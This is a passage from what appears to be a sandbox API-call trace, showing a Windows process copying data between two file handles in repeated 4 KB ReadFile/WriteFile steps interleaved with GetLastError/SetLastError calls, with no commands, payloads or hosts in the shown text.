lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.445] GetLastError () returned 0x0 [0078.445] SetLastError (dwErrCode=0x0) [0078.445] GetLastError () returned 0x0 [0078.445] SetLastError (dwErrCode=0x0) [0078.445] GetLastError () returned 0x0 [0078.445] SetLastError (dwErrCode=0x0) [0078.445] GetLastError () returned 0x0 [0078.445] SetLastError (dwErrCode=0x0) [0078.446] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.446] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.446] GetLastError () returned 0x0 [0078.446] SetLastError (dwErrCode=0x0) [0078.446] GetLastError () returned 0x0 [0078.446] SetLastError (dwErrCode=0x0) [0078.446] GetLastError () returned 0x0 [0078.446] SetLastError (dwErrCode=0x0) [0078.446] GetLastError () returned 0x0 [0078.446] SetLastError (dwErrCode=0x0) [0078.446] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.447] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.447] GetLastError () returned 0x0 [0078.447] SetLastError (dwErrCode=0x0) [0078.447] GetLastError () returned 0x0 [0078.447] SetLastError (dwErrCode=0x0) [0078.447] GetLastError () returned 0x0 [0078.447] SetLastError (dwErrCode=0x0) [0078.447] GetLastError () returned 0x0 [0078.447] SetLastError (dwErrCode=0x0) [0078.447] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.447] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.448] GetLastError () returned 0x0 [0078.448] SetLastError (dwErrCode=0x0) [0078.448] GetLastError () returned 0x0 [0078.448] SetLastError (dwErrCode=0x0) [0078.448] GetLastError () returned 0x0 [0078.448] SetLastError (dwErrCode=0x0) [0078.448] GetLastError () returned 0x0 [0078.448] SetLastError (dwErrCode=0x0) [0078.448] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.448] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.449] GetLastError () returned 0x0 [0078.449] SetLastError (dwErrCode=0x0) [0078.449] GetLastError () returned 0x0 [0078.449] SetLastError (dwErrCode=0x0) [0078.449] GetLastError () returned 0x0 [0078.449] SetLastError (dwErrCode=0x0) [0078.449] GetLastError () returned 0x0 [0078.449] SetLastError (dwErrCode=0x0) [0078.449] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.449] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.449] GetLastError () returned 0x0 [0078.449] SetLastError (dwErrCode=0x0) [0078.450] GetLastError () returned 0x0 [0078.450] SetLastError (dwErrCode=0x0) [0078.450] GetLastError () returned 0x0 [0078.450] SetLastError (dwErrCode=0x0) [0078.450] GetLastError () returned 0x0 [0078.450] SetLastError (dwErrCode=0x0) [0078.450] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.450] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.450] GetLastError () returned 0x0 [0078.450] SetLastError (dwErrCode=0x0) [0078.450] GetLastError () returned 0x0 [0078.450] SetLastError (dwErrCode=0x0) [0078.451] GetLastError () returned 0x0 [0078.451] SetLastError (dwErrCode=0x0) [0078.451] GetLastError () returned 0x0 [0078.451] SetLastError (dwErrCode=0x0) [0078.451] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.451] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.451] GetLastError () returned 0x0 [0078.451] SetLastError (dwErrCode=0x0) [0078.451] GetLastError () returned 0x0 [0078.451] SetLastError (dwErrCode=0x0) [0078.451] GetLastError () returned 0x0 [0078.451] SetLastError (dwErrCode=0x0) [0078.452] GetLastError () returned 0x0 [0078.452] SetLastError (dwErrCode=0x0) [0078.452] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.452] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.452] GetLastError () returned 0x0 [0078.452] SetLastError (dwErrCode=0x0) [0078.452] GetLastError () returned 0x0 [0078.452] SetLastError (dwErrCode=0x0) [0078.452] GetLastError () returned 0x0 [0078.452] SetLastError (dwErrCode=0x0) [0078.452] GetLastError () returned 0x0 [0078.452] SetLastError (dwErrCode=0x0) [0078.453] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.453] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.453] GetLastError () returned 0x0 [0078.453] SetLastError (dwErrCode=0x0) [0078.453] GetLastError () returned 0x0 [0078.453] SetLastError (dwErrCode=0x0) [0078.453] GetLastError () returned 0x0 [0078.453] SetLastError (dwErrCode=0x0) [0078.453] GetLastError () returned 0x0 [0078.453] SetLastError (dwErrCode=0x0) [0078.453] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.454] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.454] GetLastError () returned 0x0 [0078.454] SetLastError (dwErrCode=0x0) [0078.454] GetLastError () returned 0x0 [0078.454] SetLastError (dwErrCode=0x0) [0078.454] GetLastError () returned 0x0 [0078.454] SetLastError (dwErrCode=0x0) [0078.454] GetLastError () returned 0x0 [0078.454] SetLastError (dwErrCode=0x0) [0078.454] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.455] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.455] GetLastError () returned 0x0 [0078.455] SetLastError (dwErrCode=0x0) [0078.455] GetLastError () returned 0x0 [0078.455] SetLastError (dwErrCode=0x0) [0078.455] GetLastError () returned 0x0 [0078.455] SetLastError (dwErrCode=0x0) [0078.455] GetLastError () returned 0x0 [0078.455] SetLastError (dwErrCode=0x0) [0078.455] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.455] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.456] GetLastError () returned 0x0 [0078.456] SetLastError (dwErrCode=0x0) [0078.456] GetLastError () returned 0x0 [0078.456] SetLastError (dwErrCode=0x0) [0078.456] GetLastError () returned 0x0 [0078.456] SetLastError (dwErrCode=0x0) [0078.456] GetLastError () returned 0x0 [0078.456] SetLastError (dwErrCode=0x0) [0078.456] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.456] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.457] GetLastError () returned 0x0 [0078.457] SetLastError (dwErrCode=0x0) [0078.457] GetLastError () returned 0x0 [0078.457] SetLastError (dwErrCode=0x0) [0078.457] GetLastError () returned 0x0 [0078.457] SetLastError (dwErrCode=0x0) [0078.457] GetLastError () returned 0x0 [0078.457] SetLastError (dwErrCode=0x0) [0078.457] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.457] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.457] GetLastError () returned 0x0 [0078.458] SetLastError (dwErrCode=0x0) [0078.458] GetLastError () returned 0x0 [0078.458] SetLastError (dwErrCode=0x0) [0078.458] GetLastError () returned 0x0 [0078.458] SetLastError (dwErrCode=0x0) [0078.458] GetLastError () returned 0x0 [0078.458] SetLastError (dwErrCode=0x0) [0078.458] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.458] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.458] GetLastError () returned 0x0 [0078.458] SetLastError (dwErrCode=0x0) [0078.458] GetLastError () returned 0x0 [0078.459] SetLastError (dwErrCode=0x0) [0078.459] GetLastError () returned 0x0 [0078.459] SetLastError (dwErrCode=0x0) [0078.459] GetLastError () returned 0x0 [0078.459] SetLastError (dwErrCode=0x0) [0078.459] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.459] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.459] GetLastError () returned 0x0 [0078.459] SetLastError (dwErrCode=0x0) [0078.459] GetLastError () returned 0x0 [0078.459] SetLastError (dwErrCode=0x0) [0078.459] GetLastError () returned 0x0 [0078.460] SetLastError (dwErrCode=0x0) [0078.460] GetLastError () returned 0x0 [0078.460] SetLastError (dwErrCode=0x0) [0078.460] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.460] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.460] GetLastError () returned 0x0 [0078.460] SetLastError (dwErrCode=0x0) [0078.460] GetLastError () returned 0x0 [0078.460] SetLastError (dwErrCode=0x0) [0078.460] GetLastError () returned 0x0 [0078.460] SetLastError (dwErrCode=0x0) [0078.460] GetLastError () returned 0x0 [0078.461] SetLastError (dwErrCode=0x0) [0078.461] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.461] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.461] GetLastError () returned 0x0 [0078.461] SetLastError (dwErrCode=0x0) [0078.461] GetLastError () returned 0x0 [0078.461] SetLastError (dwErrCode=0x0) [0078.461] GetLastError () returned 0x0 [0078.461] SetLastError (dwErrCode=0x0) [0078.461] GetLastError () returned 0x0 [0078.461] SetLastError (dwErrCode=0x0) [0078.461] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.462] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.462] GetLastError () returned 0x0 [0078.462] SetLastError (dwErrCode=0x0) [0078.462] GetLastError () returned 0x0 [0078.462] SetLastError (dwErrCode=0x0) [0078.462] GetLastError () returned 0x0 [0078.462] SetLastError (dwErrCode=0x0) [0078.462] GetLastError () returned 0x0 [0078.462] SetLastError (dwErrCode=0x0) [0078.463] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.463] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.463] GetLastError () returned 0x0 [0078.463] SetLastError (dwErrCode=0x0) [0078.463] GetLastError () returned 0x0 [0078.463] SetLastError (dwErrCode=0x0) [0078.463] GetLastError () returned 0x0 [0078.463] SetLastError (dwErrCode=0x0) [0078.463] SetLastError (dwErrCode=0x0) [0078.463] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.463] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.464] SetLastError (dwErrCode=0x0) [0078.464] SetLastError (dwErrCode=0x0) [0078.464] SetLastError (dwErrCode=0x0) [0078.464] SetLastError (dwErrCode=0x0) [0078.464] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.464] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.464] SetLastError (dwErrCode=0x0) [0078.464] SetLastError (dwErrCode=0x0) [0078.464] SetLastError (dwErrCode=0x0) [0078.464] SetLastError (dwErrCode=0x0) [0078.464] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.464] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.464] SetLastError (dwErrCode=0x0) [0078.464] SetLastError (dwErrCode=0x0) [0078.464] SetLastError (dwErrCode=0x0) [0078.465] SetLastError (dwErrCode=0x0) [0078.465] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.465] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.465] SetLastError (dwErrCode=0x0) [0078.465] SetLastError (dwErrCode=0x0) [0078.465] SetLastError (dwErrCode=0x0) [0078.465] SetLastError (dwErrCode=0x0) [0078.465] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.465] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.465] SetLastError (dwErrCode=0x0) [0078.465] SetLastError (dwErrCode=0x0) [0078.465] SetLastError (dwErrCode=0x0) [0078.465] SetLastError (dwErrCode=0x0) [0078.465] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.465] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.466] SetLastError (dwErrCode=0x0) [0078.466] SetLastError (dwErrCode=0x0) [0078.466] SetLastError (dwErrCode=0x0) [0078.466] SetLastError (dwErrCode=0x0) [0078.466] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.466] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.466] SetLastError (dwErrCode=0x0) [0078.466] SetLastError (dwErrCode=0x0) [0078.466] SetLastError (dwErrCode=0x0) [0078.466] SetLastError (dwErrCode=0x0) [0078.466] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.466] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.466] SetLastError (dwErrCode=0x0) [0078.466] SetLastError (dwErrCode=0x0) [0078.466] SetLastError (dwErrCode=0x0) [0078.466] SetLastError (dwErrCode=0x0) [0078.467] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.467] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.467] SetLastError (dwErrCode=0x0) [0078.467] SetLastError (dwErrCode=0x0) [0078.467] SetLastError (dwErrCode=0x0) [0078.467] SetLastError (dwErrCode=0x0) [0078.467] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.467] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.467] SetLastError (dwErrCode=0x0) [0078.467] SetLastError (dwErrCode=0x0) [0078.467] SetLastError (dwErrCode=0x0) [0078.467] SetLastError (dwErrCode=0x0) [0078.467] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.467] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.468] SetLastError (dwErrCode=0x0) [0078.468] SetLastError (dwErrCode=0x0) [0078.468] SetLastError (dwErrCode=0x0) [0078.468] SetLastError (dwErrCode=0x0) [0078.468] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.468] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.468] SetLastError (dwErrCode=0x0) [0078.468] SetLastError (dwErrCode=0x0) [0078.468] SetLastError (dwErrCode=0x0) [0078.468] SetLastError (dwErrCode=0x0) [0078.468] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.468] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.468] SetLastError (dwErrCode=0x0) [0078.469] SetLastError (dwErrCode=0x0) [0078.469] SetLastError (dwErrCode=0x0) [0078.469] SetLastError (dwErrCode=0x0) [0078.469] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.469] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.469] SetLastError (dwErrCode=0x0) [0078.469] SetLastError (dwErrCode=0x0) [0078.469] SetLastError (dwErrCode=0x0) [0078.469] SetLastError (dwErrCode=0x0) [0078.469] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.469] WriteFile (in: 